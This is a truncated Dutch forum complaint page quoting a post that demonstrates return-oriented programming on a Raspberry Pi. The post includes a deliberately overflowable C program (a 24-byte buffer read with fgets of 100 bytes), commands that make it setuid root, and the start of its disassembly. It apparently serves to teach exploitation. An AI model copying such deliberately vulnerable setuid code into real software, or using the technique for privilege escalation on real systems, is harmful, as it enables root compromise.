Je hebt een klacht over de onderstaande posting:
Op de Raspberry PI compileert gcc een applicatie standaard zonder stack-beveiliging. Merk op, dat de adressen per versie Raspbian kunnen variëren. (test gedaan met 2019-04-08-raspbian-stretch-lite.img) POC: ropme.c ? #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { char buffer[24]; char command[]="/usr/bin/uptime"; system(command); printf("ROP me : "); fgets(buffer, 100, stdin); } pi@raspberrypi:~/overflow $ gcc ropme.c -o ropme pi@raspberrypi:~/overflow $ sudo chown root:root ropme pi@raspberrypi:~/overflow $ sudo chmod 4755 ropme pi@raspberrypi:~/overflow $ objdump -d ropme ….. 104e8: e88c000f stm ip, {r0, r1, r2, r3} 104ec: e24b302c sub r3, fp, #44 ; 0x2c 104f0: e1a00003 mov r0, r3 104f4: ebffffa0 bl 1037c <system@plt> 104f8: e59f002c ldr r0, [pc, #44] ; 1052c <main+0x64> 104fc: ebffff95 bl 10358 <printf@plt> 10500: e59f3028 ldr r3, [pc, #40] ; 10530 <main+0x68> 10504: e5932000 ldr r2, [r3] 10508: e24b301c sub r3, ...
Beschrijf je klacht (Optioneel):